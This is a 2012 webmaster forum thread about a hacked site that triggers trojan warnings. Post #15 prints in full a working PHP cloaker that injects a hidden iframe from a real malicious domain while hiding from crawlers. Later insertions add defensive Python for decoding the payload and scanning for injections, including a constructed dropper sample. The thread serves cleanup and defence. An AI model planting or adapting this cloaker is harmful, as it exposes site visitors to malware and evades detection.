Leading Community for Usability, Search Engine Marketing,
Social Networking, Site Planning & Web Site Development, Since 1998

My Site Is Throwing Virus Warnings. :(


42 replies to this topic

#1 Dr.Marie

Posted 30 March 2012 - 05:19 PM

I've had a few of my Facebook fans tell me that when they click on links to my site, their virus checker gives them a trojan warning.

A few months ago I found someone had planted malicious code in my header and changed my .htaccess. I'm certain I've cleaned it all.

I have a couple of theories:

1. It's possible that during the 12 hours or so that the virus was there previously, my site got picked up by virus checking companies and is on a list as suspicious. If so, how do I get off of a list?

2. Perhaps another site on my shared hosting plan has a virus and as such my ip is flagged as suspicious? If this is the case, this should be cleared up shortly as I am migrating to a new host soon.

3. Perhaps there still is a virus present. Is there any way I can check for one?

I greatly appreciate any thoughts you guys have!

Marie

#2 DonnaFontenot

Posted 30 March 2012 - 05:43 PM

Have you checked Webmaster tools for any notifications? Or used the Fetch as Googlebot feature there to see if it's showing spammy stuff to Googlebot only?

#3 Dr.Marie

Posted 31 March 2012 - 12:52 PM

Thanks Donna...I have no warnings in WMT. I fetched as Googlebot and nothing looks fishy. I can account for every line of code on the page.

Grrr...

#4 DonnaFontenot

Posted 31 March 2012 - 03:57 PM

Looks ok here: http://www.google.co...vetquestion.com

Ok here: http://safeweb.norton.com/

Ok here: http://www.avg.com.a...b-page-scanner/

#5 Dr.Marie

Posted 31 March 2012 - 07:29 PM

Thanks so much Donna. I appreciate you taking the time to help!

I really think that the people who are getting warnings have not updated their virus definitions. An article of mine was just posted on a major veterinary board and someone commented saying, "Don't click! Avast says the site has a Trojan!" The next person responded saying they had Avast 2012 and got no warning.

#6 DonnaFontenot

Posted 01 April 2012 - 08:41 AM

I think you're right or at least somewhat on the right track. It's bound to be some residual effect from the previous problem. I don't know what the solution is. I guess I'd probably try to find out if there is a blacklist out there that the site is on, but I don't know how to find it.

#7 DonnaFontenot

Posted 01 April 2012 - 08:50 AM

Hmmm...wait a second. This test does say it has malware: http://sitecheck.sucuri.net/scanner/

It's questioning a script on aboutus.php and question_list.php - which contains a url pointing to frankwscanoes [dot] somethingorother

Please don't attempt to go to that site as it is likely ready to infect computers. I've purposely made it non clickable and changed the bit following the dot (which is not com).

You may indeed have an issue.

#8 Dr.Marie

Posted 01 April 2012 - 05:50 PM

What the? Thanks again Donna. I've been getting calls all day from people saying, "I tried to read your article but my antivirus says there is a trojan."

I'm lost as to what to do now. I don't see that code anywhere on my site.

#9 DonnaFontenot

Posted 01 April 2012 - 06:14 PM

I assume you also checked the database? And looked for encrypted code?

#10 Dr.Marie

Posted 01 April 2012 - 06:17 PM

That is a good point. If the bad code was in my database this could explain why the virus message comes up sporadically because my database randomly chooses questions to display on the page.

I'm not sure how to check the database for viruses. I will investigate though.

Donna...do you think this is something you could flesh out for me? I'm quite willing to pay you for your service!

#11 Dr.Marie

Posted 01 April 2012 - 07:15 PM

Donna, that site, sucuri.net offers cleanup and monitoring for further viruses for $90. I'm thinking I'm going to do that unless you feel that you (or I) can do it. Thanks!

#12 DonnaFontenot

Posted 01 April 2012 - 09:49 PM

Oh I definitely won't tackle that. My best buddy Michael cleans sites for a living, so I know how complex it can be to make sure everything gets uncovered. I'd not want to miss anything. He does, however, list some sql statements you can run in his cleaning post - http://smackdown.blo...s-installation/ So you might want to run those first.

#13 Michael_Martinez

Posted 02 April 2012 - 04:59 AM

Marie, make sure you're logged out when you try to check your pages for malware warnings. I have read that some trojans are clever enough to hide themselves from logged in admins.

#14 glyn

Posted 02 April 2012 - 06:06 AM

Is this a WP site?

#15 Dr.Marie

Posted 02 April 2012 - 08:16 PM

Good news! The problem is fixed!

I contacted my host and they were able to see and remove the malicious code.

If you are interested, here is what happened. There was a file called footer.php that was inserted in a directory. The directory was one that is used to host files that do calculations for a tool that I created. There should not have been a footer.php in that directory. Here is the file:

<?php
// Cloaking script found in the tools directory (posted as found; comments added).
// Suppress every PHP error so nothing leaks into the page or the server log.
error_reporting(0);

// Search-engine and scanner address ranges, keyed by the first three octets.
$bot_ips = array("8.6.48","62.172.199","62.27.59","63.163.102","64.157.137","64.157.138","64.233.173","64.68.80","64.68.81","64.68.82","64.68.83","64.68.84","64.68.85","64.68.86","64.68.87","64.68.88","64.68.89","64.68.90","64.68.91","64.68.92","64.75.36","66.163.170","66.163.174","66.196.101","66.196.65","66.196.67","66.196.72","66.196.73","66.196.74","66.196.77","66.196.78","66.196.80","66.196.81","66.196.90","66.196.91","66.196.92","66.196.93","66.196.97","66.196.99","66.218.65","66.218.70","66.228.164","66.228.165","66.228.166","66.228.173","66.228.182","66.249.64","66.249.65","66.249.66","66.249.67","66.249.68","66.249.69","66.249.70","66.249.71","66.249.72","66.249.73","66.249.78","66.249.79","66.94.230","66.94.232","66.94.233","66.94.238","67.195.115","67.195.34","67.195.37","67.195.44","67.195.45","67.195.50","67.195.51","67.195.52","67.195.53","67.195.54","67.195.58","67.195.98","68.142.195","68.142.203","68.142.211","68.142.212","68.142.230","68.142.231","68.142.240","68.142.246","68.142.249","68.142.250","68.142.251","68.180.216","68.180.250","68.180.251","69.147.79","72.14.199","72.30.101","72.30.102","72.30.103","72.30.104","72.30.107","72.30.110","72.30.111","72.30.124","72.30.128","72.30.129","72.30.131","72.30.132","72.30.133","72.30.134","72.30.135","72.30.142","72.30.161","72.30.177","72.30.179","72.30.213","72.30.214","72.30.215","72.30.216","72.30.221","72.30.226","72.30.252","72.30.54","72.30.56","72.30.60","72.30.61","72.30.65","72.30.78","72.30.79","72.30.81","72.30.87","72.30.9","72.30.97","72.30.98","72.30.99","74.6.11","74.6.12","74.6.13","74.6.131","74.6.16","74.6.17","74.6.18","74.6.19","74.6.20","74.6.21","74.6.22","74.6.23","74.6.24","74.6.240","74.6.25","74.6.26","74.6.27","74.6.28","74.6.29","74.6.30","74.6.31","74.6.65","74.6.66","74.6.67","74.6.68","74.6.69","74.6.7","74.6.70","74.6.71","74.6.72","74.6.73","74.6.74","74.6.75","74.6.76","74.6.79","74.6.8","74.6.85","74.6.86","74.6.87","74.6.9","74.55.27","141.185.209","169.207.238","199.177.18","202.160.178","202.160.179","202.160.180","202.160.181","202.160.183","202.160.185","202.165.96","202.165.98","202.165.99","202.212.5","202.46.19","203.123.188","203.141.52","203.255.234","206.190.43","207.126.239","209.1.12","209.1.13","209.1.32","209.1.38","209.131.40","209.131.41","209.131.48","209.131.49","209.131.50","209.131.51","209.131.60","209.131.62","209.185.108","209.185.122","209.185.141","209.185.143","209.185.253","209.191.123","209.191.64","209.191.65","209.191.82","209.191.83","209.67.206","209.73.176","209.85.238","211.14.8","211.169.241","213.216.143","216.109.121","216.109.126","216.136.233","216.145.58","216.155.198","216.155.200","216.155.202","216.155.204","216.239.193","216.239.33","216.239.37","216.239.39","216.239.41","216.239.45","216.239.46","216.239.51","216.239.53","216.239.57","216.239.59","216.32.237","216.33.229","174.129.130", "94.75.242", "74.55.27");

// Crawler, scanner and download-tool user-agent fragments. Note that 'chrome'
// is in this list too, so Chrome users never receive the payload either.
$bot_agents = array('chrome', 'gtb', 'altavista', 'ask jeeves', 'bingbot', 'download master', 'google', 'php', 'httrack', 'java', 'jeeves', 'libwww-perl', 'listchecker', 'lycos', 'msiecrawler', 'msnbot', 'msnbot-media', 'netcache', 'offline explorer', 'pear', 'python', 'slurp', 'spider', 'teleport pro', 'twiceler', 'webalta', 'webcopier', 'webcrawler', 'webzip', 'wget', 'yahoo', 'yandex');

// Only user agents that name a desktop OS are treated as real visitors.
$good_agents = array('windows', 'macintosh');

// Classify the request: no desktop OS in the UA, a listed /24, or a listed
// UA fragment means "bot", and bots are shown the clean page.
$arr = explode(".", $_SERVER["REMOTE_ADDR"]);
$ip = $arr[0].".".$arr[1].".".$arr[2];
$agent = strtolower($_SERVER['HTTP_USER_AGENT']);
$BOT = false;
$c = false;
foreach ( $good_agents as $one )
{
    if ( strstr($agent, $one) )
    {
        $c = true;
        break;
    }
}
if ( !$c )
{
    $BOT = true;
}
elseif ( in_array($ip, $bot_ips) )
{
    $BOT = true;
}
else
{
    foreach ( $bot_agents as $one )
    {
        if ( strstr($agent, $one) )
        {
            $BOT = true;
            break;
        }
    }
}

// The payload, stored URL-encoded so a plain grep for "<iframe" or for the
// domain finds nothing. Decoded, it is a document.write() of a 1x1 hidden
// iframe whose tag name and host are assembled from fragments ("if"+"ra"+"me").
$code = '%3Cscript+language%3D%27JavaScript%27%3Edocument.write%28%22%3C%22%2B%22if%22%2B%22ra%22%2B%22me%22%2B%22+src%3D%27http%3A%2F%2F%22%2B%22frankwsa%22%2B%22migos.in%22%2B%22%2Fshowads.php%3F2%26seoref%3D%22%2BencodeURIComponent%28document.referrer%29%2B%22%26HTTP_REFERER%3D%22%2BencodeURIComponent%28document.URL%29%2B%22%27+width%3D%271%27+height%3D%271%27+frameborder%3D%270%27%3E%3C%2F%22%2B%22if%22%2B%22ra%22%2B%22me%22%2B%22%3E%22%29%3B%3C%2Fscript%3E';
$code = urldecode($code);

// Sets a one-day cookie so each visitor is served the iframe only once;
// a second look at the same page from the same browser shows nothing.
$code2 = '<script language="JavaScript">
function SetCookie(cookieName,cookieValue,nDays) {
var today = new Date();
var expire = new Date();
if (nDays==null || nDays==0) nDays=1;
expire.setTime(today.getTime() + 3600000*24*nDays);
document.cookie = cookieName+"="+escape(cookieValue)
                 + ";expires="+expire.toGMTString()+";path=/";
}
SetCookie("bestourproxydone", "100500", 1);
</script>';

// Real visitors without the cookie get the cookie-setter plus the iframe; bots get nothing.
if ( !$BOT && !isset($_COOKIE['bestourproxydone']) )
{
    $out = isset($code2) ? $code2."\n".$code : $code;
    print $out;
}
?>

I'm guessing that what it does is hide the badness from bots. (Which is likely why my WMT didn't give me a warning.) Then, I'm guessing that what it does is show ads to the user rather than having them see my ads. Sneaky.

My host figures that when I was hacked a few months ago there was an open door that allowed the hackers to plant this code. They said it's also possible that I got infected by accessing my cpanel from an infected PC. Interestingly enough, one of our computers was severely virus infested this week. The computer tech said it was the worst they had seen and it took them 3 days to get the thing off. Who knows if the virus came from my site or if this virus actually infected my site.

I am suspicious that this started shortly after I installed my forum (which is now gone). But I guess I'll never know.

Thanks to all who tried to help!
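Added example, not code from the thread or from the site: this decodes a payload of the same shape as the $code string in the footer.php above and replays the script's visitor classification, so you can see exactly who would and would not have been served the hidden iframe. The encoded string below is a constructed stand-in with the real domain replaced by the reserved name bad-ads.example.invalid; the IP prefixes are a constructed subset of the script's $bot_ips list, and the visitor profiles use documentation-range addresses.

```python
"""Decode a cloaked iframe payload and replay the cloaker's gating logic (added example)."""
import re
from urllib.parse import unquote_plus

# Constructed stand-in for the script's $code string (real domain replaced).
ENCODED_PAYLOAD = (
    "%3Cscript+language%3D%27JavaScript%27%3Edocument.write%28%22%3C%22%2B%22if%22%2B"
    "%22ra%22%2B%22me%22%2B%22+src%3D%27http%3A%2F%2F%22%2B%22bad%22%2B%22-ads.example.invalid"
    "%22%2B%22%2Fshowads.php%3F2%26seoref%3D%22%2BencodeURIComponent%28document.referrer%29"
    "%2B%22%26HTTP_REFERER%3D%22%2BencodeURIComponent%28document.URL%29%2B%22%27+width%3D"
    "%271%27+height%3D%271%27+frameborder%3D%270%27%3E%3C%2F%22%2B%22if%22%2B%22ra%22%2B"
    "%22me%22%2B%22%3E%22%29%3B%3C%2Fscript%3E"
)

# "abc"+"def" -> "abcdef": the script splits the tag name and host this way so
# neither "<iframe" nor the domain appears anywhere in the file as plain text.
CONCAT = re.compile(r'"([^"\\]*)"\s*\+\s*"([^"\\]*)"')
IFRAME_HOST = re.compile(r"<iframe[^>]*\ssrc=['\"]https?://([^/'\"]+)", re.I)


def collapse_concats(js):
    """Repeatedly join adjacent double-quoted literals until nothing changes."""
    prev = None
    while prev != js:
        prev = js
        js = CONCAT.sub(lambda m: '"' + m.group(1) + m.group(2) + '"', js)
    return js


def decode_payload(encoded):
    """PHP urldecode() equivalent, then de-fragment. Returns (readable JS, iframe hosts)."""
    js = collapse_concats(unquote_plus(encoded))
    return js, IFRAME_HOST.findall(js)


# Constructed subset of $bot_ips (first three octets) and $bot_agents from the script.
BOT_IP_PREFIXES = {"66.249.64", "66.249.65", "66.249.66", "72.14.199", "74.6.8"}
BOT_AGENTS = ("chrome", "google", "slurp", "msnbot", "bingbot", "yandex", "wget", "python", "spider")
GOOD_AGENTS = ("windows", "macintosh")
COOKIE_NAME = "bestourproxydone"


def treated_as_bot(remote_addr, user_agent):
    """Same decision as the PHP: no desktop OS in the UA, a listed /24, or a listed UA fragment."""
    ip24 = ".".join(remote_addr.split(".")[:3])
    agent = user_agent.lower()
    if not any(g in agent for g in GOOD_AGENTS):
        return True
    if ip24 in BOT_IP_PREFIXES:
        return True
    return any(b in agent for b in BOT_AGENTS)


def served_payload(remote_addr, user_agent, cookies):
    """True when this request would have received the cookie-setter plus the iframe."""
    return not treated_as_bot(remote_addr, user_agent) and COOKIE_NAME not in cookies


FIREFOX_WIN = "Mozilla/5.0 (Windows NT 6.1; rv:11.0) Gecko/20100101 Firefox/11.0"
# Constructed visitor profiles: (address, user agent, cookies present).
VISITORS = {
    "googlebot": ("66.249.66.1", "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)", {}),
    "firefox_windows_first_visit": ("203.0.113.10", FIREFOX_WIN, {}),
    "firefox_windows_second_visit": ("203.0.113.10", FIREFOX_WIN, {COOKIE_NAME: "100500"}),
    "chrome_windows": ("203.0.113.11", "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.19 (KHTML, like Gecko) Chrome/18.0.1025.162 Safari/535.19", {}),
    "firefox_windows_from_listed_net": ("72.14.199.5", FIREFOX_WIN, {}),
    "safari_mac": ("198.51.100.7", "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) AppleWebKit/534.55.3 (KHTML, like Gecko) Version/5.1.3 Safari/534.53.10", {}),
}


def who_gets_the_iframe():
    """Map each constructed visitor profile to whether the cloaker would inject for it."""
    return {name: served_payload(*req) for name, req in VISITORS.items()}


if __name__ == "__main__":
    js, hosts = decode_payload(ENCODED_PAYLOAD)
    print(js)
    print("iframe hosts:", hosts)
    for name, served in who_gets_the_iframe().items():
        print(f"{name:32s} {'INJECTED' if served else 'clean page'}")
```

The replay is consistent with what the thread saw: a Googlebot fetch, anything from a listed crawler network, a Chrome browser, and any browser that already holds the cookie all get the clean page, while a first visit from Firefox or Safari on an ordinary address gets the iframe. When you check a site for this kind of injection, request it with a desktop user agent, no cookies, from an address the script does not list, and compare the body against what a crawler user agent receives.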

#16 Dr.Marie

Posted 03 April 2012 - 02:32 PM

As an interesting twist, the nasty footer.php file keeps repopulating itself. For now I have deleted it and created a new blank file called footer.php in the hopes that it will stop the virus from creating a new file. I'm waiting to see what my host says.

#17 DonnaFontenot

Posted 03 April 2012 - 04:11 PM

See, that's why I don't clean sites and don't recommend people do it themselves. A back door was left open and it will keep getting reinfected over and over and over again until all avenues are closed. I've paid attention to the many times that Michael has cleaned sites and the work involved is pretty intense, to make sure nothing is missed.

#18 Michael_Martinez

Posted 03 April 2012 - 05:35 PM

If you're not supposed to have a footer.php file then there should be relatively few references to it in your library of PHP files. If you are using a Linux-based server and IF you can telnet to it and IF you know how to do that, you can probably find the script that is still corrupted by using a command line query similar to this:

grep -r 'footer.php' * > ./footer-report.txt

That would put all its results into the text file "footer-report.txt", which you could download and browse casually. Knowing where the corrupted script is would point you to which theme/plugin directory should be re-installed (or de-installed).

If you try this, be sure to check again after you re-install anything to make sure you're not just installing a corrupted package.

#19 DonnaFontenot

Posted 03 April 2012 - 07:10 PM

Except the reference might be encrypted and stored somewhere in the database, rather than in plain sight in a file.
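Added example, not code from the thread or from the site, covering both Michael's grep for references to footer.php and Donna's caveat that the reference may be encoded and sitting in the database. It walks a document root, records which files mention footer.php, matches a handful of indicators drawn from the cloaker quoted earlier in the thread (error_reporting(0), a URL-encoded <script, user-agent and cookie gates, code that writes .php files), and base64-decodes long blobs so a hidden reference is found even when it is not in plain sight. The sample site tree, the dropper plugin in it and the wp_options dump line are all constructed here for the demonstration; the indicator list is a starting point, not a complete signature set.

```python
"""Triage scanner for injected PHP and encoded references, run over a constructed sample (added example)."""
import base64
import binascii
import os
import re
import tempfile

# Indicators modelled on the cloaking footer.php quoted in this thread.
INDICATORS = {
    "error_reporting_off": re.compile(r"error_reporting\s*\(\s*0\s*\)"),
    "encoded_script_tag": re.compile(r"%3Cscript", re.I),          # urlencode()d "<script"
    "eval_of_decoded": re.compile(r"eval\s*\(\s*(base64_decode|gzinflate|str_rot13|urldecode)", re.I),
    "ua_gate": re.compile(r"HTTP_USER_AGENT"),                      # bots and people treated differently
    "cookie_gate": re.compile(r"\$_COOKIE\s*\["),                   # one payload per visitor
    "writes_php_file": re.compile(r"(file_put_contents|fopen|fwrite)\s*\([^;]*\.php", re.I),
    "hidden_iframe": re.compile(r"<iframe[^>]*(width|height)\s*=\s*['\"]?[01]['\"]?", re.I),
}
BASE64_BLOB = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")


def scan_text(text):
    """Sorted indicator names found in text; "b64:" prefix marks hits found only inside decoded blobs."""
    hits = {name for name, rx in INDICATORS.items() if rx.search(text)}
    for blob in BASE64_BLOB.findall(text):
        try:
            decoded = base64.b64decode(blob).decode("utf-8", "ignore")
        except (binascii.Error, ValueError):
            continue
        hits.update("b64:" + name for name, rx in INDICATORS.items() if rx.search(decoded))
    return sorted(hits)


def _walk(root):
    """Yield (relative path, text) for every file under root up to 1 MB."""
    for dirpath, _, files in os.walk(root):
        for fn in files:
            path = os.path.join(dirpath, fn)
            if os.path.getsize(path) > 1_000_000:
                continue
            with open(path, encoding="utf-8", errors="ignore") as fh:
                yield os.path.relpath(path, root).replace(os.sep, "/"), fh.read()


def scan_tree(root):
    """Map relative path -> indicator hits, for files with at least one hit."""
    out = {}
    for rel, text in _walk(root):
        hits = scan_text(text)
        if hits:
            out[rel] = hits
    return out


def references_to(root, name="footer.php"):
    """The grep from the post: which files mention the file that should not exist."""
    return sorted(rel for rel, text in _walk(root) if name in text)


# Constructed sample tree: a clean index and theme footer, the stray cloaker in
# the tools directory, and a plugin file that re-creates it (the reinfection source).
DROPPER_B64 = base64.b64encode(b"<?php error_reporting(0); /* cloaker body */").decode()
SAMPLE_FILES = {
    "index.php": "<?php include 'header.php'; ?>\n<p>Ask a question</p>\n<?php include 'footer.php'; ?>\n",
    "footer.php": "<footer>&copy; example site</footer>\n",
    "tools/calc/footer.php": (
        "<?php\nerror_reporting(0);\n"
        "$agent = strtolower($_SERVER['HTTP_USER_AGENT']);\n"
        "$code = urldecode('%3Cscript%3Ealert%281%29%3C%2Fscript%3E');\n"
        "if (!isset($_COOKIE['seen'])) { print $code; }\n"
    ),
    "wp-content/plugins/seo-helper/helper.php": (
        "<?php\n// constructed dropper: re-creates the cloaker whenever it is missing, then includes it\n"
        "if (!file_exists(dirname(__FILE__) . '/../../../tools/calc/footer.php')) {\n"
        "  file_put_contents(dirname(__FILE__) . '/../../../tools/calc/footer.php', base64_decode('"
        + DROPPER_B64 + "'));\n}\n@include(dirname(__FILE__) . '/../../../tools/calc/footer.php');\n"
    ),
}


def sample_sql_dump():
    """Constructed wp_options row: a text widget whose value is a base64-wrapped hidden iframe."""
    payload = b"<iframe src='http://bad-ads.example.invalid/a.php' width='1' height='1'></iframe>"
    blob = base64.b64encode(payload).decode()
    return ("INSERT INTO `wp_options` (option_id, option_name, option_value, autoload) VALUES\n"
            "(99, 'widget_text', 'a:1:{i:2;a:1:{s:4:\"text\";s:%d:\"%s\";}}', 'yes');\n" % (len(blob), blob))


def build_sample_site(root):
    for rel, content in SAMPLE_FILES.items():
        path = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w", encoding="utf-8") as fh:
            fh.write(content)


def demo():
    """Build the sample tree in a temp dir and return the three triage results."""
    root = tempfile.mkdtemp(prefix="site-")
    build_sample_site(root)
    return {"hits": scan_tree(root), "refs": references_to(root), "sql": scan_text(sample_sql_dump())}


if __name__ == "__main__":
    for key, value in demo().items():
        print(key, value)
```

On the sample, the stray tools/calc/footer.php trips four indicators, the plugin file is flagged both for writing a .php file and for the error_reporting(0) hidden inside its base64 string, the clean index and theme footer are not flagged at all, and the SQL dump yields b64:hidden_iframe even though nothing in the row reads as HTML. Against a real site, run scan_tree over the document root and scan_text over a mysqldump of the database, then treat every file that writes or includes the unexpected footer.php as the thing to remove before cleaning the footer itself, otherwise it comes back.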

#20 Dr.Marie

Posted 03 April 2012 - 07:42 PM

My host has found some more corrupted files...all of these are from my wordpress blogs. I feel like a dolt because I changed all of my main passwords but didn't change my wp admin passwords. This is likely part of the problem.

The host says they are going to do a manual audit of the site to see if they can pick up any more bad stuff.

Why on earth do people create viruses like this? Ugh.
